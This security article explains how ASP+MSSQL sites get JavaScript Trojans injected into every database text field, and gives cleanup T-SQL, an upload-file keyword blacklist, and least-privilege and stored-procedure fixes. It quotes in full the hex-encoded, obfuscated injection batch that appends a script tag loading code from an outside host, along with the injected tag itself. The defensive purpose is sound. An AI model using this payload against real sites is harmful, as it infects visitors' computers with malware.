Recently, many websites built with ASP+MSSQL have had their SQL databases seeded with JS Trojans by hackers; a friend's website was hit in exactly this way.
Every varchar and text field in the MSSQL database had a piece of JS code inserted into it automatically. Even after that code is deleted, if the root cause is not fixed, the same JS code is inserted into the database again within a few minutes.
From Piao Yi's observation, this is very likely done by an automated program. The hackers first use search engines such as Google and Baidu to find vulnerable sites built with ASP+MSSQL, then scan the whole site with an injection scanner such as Xiao Mingzi. Once a SQL injection or file upload vulnerability is found, they use it to upload a web shell of their own, such as the Haiyang ASP Trojan; then they add the site to their "broiler" list (compromised hosts they control) and insert whatever JS they want into the database at any time. That JS usually loads numerous viruses and Trojans, which ultimately infect the computers of users who visit the controlled site.
You can temporarily get rid of the inserted JS with a batch replace in SQL Query Analyzer, but unless the site's vulnerabilities are fixed at the root, both in the program and in the server's security permissions, the hackers can get back into the site database at any time.
In SQL Query Analyzer, the following statement replaces the injected JS code in one table in batch. The string must match exactly what was inserted (the tag below is the one found in the friend's database), and REPLACE cannot be applied directly to a text or ntext column; such columns must first be cast to varchar.
update table name set field name=replace(field name,'<Script Src=http://cn%75clear3.com/css/c.js></Script>','')
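The statement above handles one column of one table, while the attack (see the payload further down) hits every character column of every user table. The following T-SQL is an added example, not code from the original article: it goes beyond the single-table statement and walks INFORMATION_SCHEMA.COLUMNS to count, and optionally strip, the injected tag in every char, varchar, nchar, nvarchar, text and ntext column. It assumes SQL Server 2005 or later (nvarchar(max)); the tag in @needle is the one quoted on this page and must match the stored value exactly. Back up the database before running it with @dryRun = 0.

```sql
-- Added example: locate (and optionally remove) an injected <script> tag in
-- every character column of every user table. Not from the original article.
-- Assumes SQL Server 2005+ (nvarchar(max)); @needle is the exact injected tag.
SET NOCOUNT ON;

DECLARE @needle nvarchar(4000);
SET @needle = N'<Script Src=http://cn%75clear3.com/css/c.js></Script>';

DECLARE @dryRun bit;
SET @dryRun = 1;   -- 1 = only count contaminated rows, 0 = actually clean them

DECLARE @schema sysname, @table sysname, @column sysname;
DECLARE @sql nvarchar(max), @n int;

-- One row per contaminated column, with the number of rows affected.
DECLARE @hits TABLE (SchemaName sysname, TableName sysname, ColumnName sysname, RowsHit int);

DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- CHARINDEX instead of LIKE: the injected URL contains '%', which LIKE
    -- would treat as a wildcard. QUOTENAME protects the identifiers spliced
    -- into the statement; the needle itself is passed as a parameter.
    -- The CAST is what makes REPLACE work on text/ntext columns at all.
    IF @dryRun = 1
        SET @sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                 + N' WHERE CHARINDEX(@needle, CAST(' + QUOTENAME(@column) + N' AS nvarchar(max))) > 0';
    ELSE
        SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                 + N' SET ' + QUOTENAME(@column) + N' = REPLACE(CAST(' + QUOTENAME(@column)
                 + N' AS nvarchar(max)), @needle, N'''')'
                 + N' WHERE CHARINDEX(@needle, CAST(' + QUOTENAME(@column) + N' AS nvarchar(max))) > 0;'
                 + N' SET @n = @@ROWCOUNT';

    EXEC sp_executesql @sql, N'@needle nvarchar(4000), @n int OUTPUT', @needle, @n OUTPUT;

    IF @n > 0
        INSERT INTO @hits VALUES (@schema, @table, @column, @n);

    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;

-- Which columns were hit, worst first. Run with @dryRun = 1 before cleaning,
-- and again afterwards: a non-empty result a few minutes later means the
-- hole the attacker uses is still open.
SELECT * FROM @hits ORDER BY RowsHit DESC;
```

Run it once with @dryRun = 1 to see the damage, then with @dryRun = 0 to clean; with the default case-insensitive collation REPLACE also catches the tag in a different letter case. Note that this only removes the symptom; the two vulnerabilities below are what let the attacker put the tag back.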
flymorn carefully checked the website and found several security issues:
First, the website has an upload vulnerability. Although uploading requires administrator authentication and the file type is checked, the administrator check relies on a cookie, and cookies can be forged; and since the content of the uploaded picture is not inspected after it is saved, a "picture Trojan" (an ASP shell hidden inside an image file) can easily be uploaded.
Solutions: 1. remove the upload function (not practical); 2. change the upload authentication from cookie to session; 3. inspect the content of the uploaded file and delete it if it is a picture Trojan. The following check can be used as a reference. A keyword blacklist like this is only a last line of defence, since it can be bypassed with encoding; the stronger fix is to configure IIS so that nothing in the upload directory is executed as script, so that an uploaded shell is served as a plain file.
'================ Check whether the uploaded file contains illegal strings: start ================
' filePath is the virtual path of the file that has just been saved
Set MyFile = Server.CreateObject("Scripting.FileSystemObject")
Set MyText = MyFile.OpenTextFile(Server.MapPath(filePath), 1) ' 1 = ForReading
sTextAll = LCase(MyText.ReadAll)
MyText.Close
Set MyFile = Nothing
' ASP/VBScript fragments that have no business being inside an image file
sStr = "<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = Split(sStr, "|")
For i = 0 To UBound(sNoString)
    If InStr(sTextAll, sNoString(i)) > 0 Then
        ' Delete the file, tell the uploader, and stop processing the request
        Set filedel = Server.CreateObject("Scripting.FileSystemObject")
        filedel.DeleteFile Server.MapPath(filePath)
        Set filedel = Nothing
        Response.Write("<script>alert('There is a problem with the file you uploaded; the upload failed!');history.back();</script>")
        Response.End
    End If
Next
'================ Check whether the uploaded file contains illegal strings: end ================
Second, the website has a cookie injection vulnerability. To reduce server overhead, the program authenticates users after login purely by cookie, and that cookie stores the user's ID and NAME. As everyone knows, cookies are easily forged; that is one problem. In addition, some external parameters are not read with the strict Request.Form or Request.QueryString but, for brevity, with Request("id").
We know that ASP's Request("name") searches its collections in a fixed order (QueryString, Form, Cookies, ClientCertificate, ServerVariables) and returns the first match, so when neither the query string nor the form carries the value, it is taken from the cookie. Programmers routinely think about SQL injection through Request.Form and Request.QueryString and filter those two, but forget that the very same value can arrive in a cookie, which their filter never sees. The fix is to read the value from the collection you expect (Request.QueryString("id") or Request.Form("id")), convert it to the type you expect (CLng) before it gets anywhere near SQL, and pass it as a parameter instead of concatenating it into the statement. Consider the following SQL statement:
SQL = "select * from table name where id=" & request("id")
If this id happens to be taken from a cookie, think about how bad that is: the injector can easily forge a cookie named id, because the server itself hands the client a cookie of that name, and the forged value can be a piece of code like the following. It is a CAST of a hex-encoded string; decoded, it is a T-SQL batch that declares a cursor over sysobjects and syscolumns, selects every text, ntext, nvarchar and varchar column (xtype 35, 99, 231 and 167) of every user table (xtype 'u'), and runs a dynamic UPDATE on each one that appends </title><script src=http://%6b%6b%36%2e%75%73/1.js></script> to every value. The mixed case (dEcLaRe, vArChAr) and the hex encoding exist only to slip past naive keyword filters:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69442041 6e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c40632077686 96c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--
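The payload only succeeds because the connection the ASP page uses can run an arbitrary batch and holds UPDATE on every user table; on many sites of this kind the connection string even used sa. The following T-SQL is an added example, not code from the original article, showing the two server-side measures that blunt it under the "server security permissions" heading above: a dedicated low-privilege login for the site, and the "where id=" lookup moved into a stored procedure with a typed parameter. The names SiteDb, Articles, GetArticle and web_app are assumptions for illustration; the password is a placeholder. On the ASP side the page then calls the procedure through an ADODB.Command with adCmdStoredProc and an adInteger parameter instead of building the string shown earlier.

```sql
-- Added example, not from the original article. Creates a low-privilege login
-- for the site and a parameterized lookup procedure. SiteDb, Articles,
-- GetArticle and web_app are assumed names; replace the password placeholder.
USE master;
GO
CREATE LOGIN web_app WITH PASSWORD = N'<long random password>', CHECK_POLICY = ON;
GO

USE SiteDb;
GO
CREATE USER web_app FOR LOGIN web_app;
GO

-- The lookup the article builds as  "select * from table name where id=" & request("id")
-- becomes a procedure. @id is an int, so a value such as
-- "dEcLaRe @s vArChAr(4000);..." can never become part of the statement text,
-- whichever collection (query string, form or cookie) it arrived in.
CREATE PROCEDURE dbo.GetArticle
    @id int
AS
BEGIN
    SET NOCOUNT ON;
    SELECT * FROM dbo.Articles WHERE id = @id;
END
GO

-- The web login may only execute the site's procedures and gets no rights on
-- the tables themselves. Because dbo owns both the procedure and the table,
-- ownership chaining lets the procedure read dbo.Articles without the caller
-- holding SELECT on it.
GRANT EXECUTE ON dbo.GetArticle TO web_app;   -- repeat for each procedure the site calls

-- The injected batch depends on UPDATE on every user table. Deny it explicitly
-- so that a later careless GRANT or a broad role cannot reopen that path; the
-- DENY is not evaluated inside the ownership chain, so the procedures keep working.
DENY INSERT, UPDATE, DELETE ON SCHEMA::dbo TO web_app;
GO

-- Check: impersonate the web login and try what the injected batch tries.
EXECUTE AS USER = 'web_app';
EXEC dbo.GetArticle @id = 1;                                   -- allowed
UPDATE dbo.Articles SET title = title + N'<script></script>';  -- error: UPDATE permission was denied on 'Articles'
REVERT;
GO
```

With this in place a forged cookie can at most make the lookup fail with a type conversion error, and even a batch that does get executed through some other hole runs as web_app, whose cursor over sysobjects and syscolumns finds the columns but cannot update a single one of them. Fixing the ASP code so that it never concatenates request values into SQL is still required; the permissions are the second layer, not a replacement.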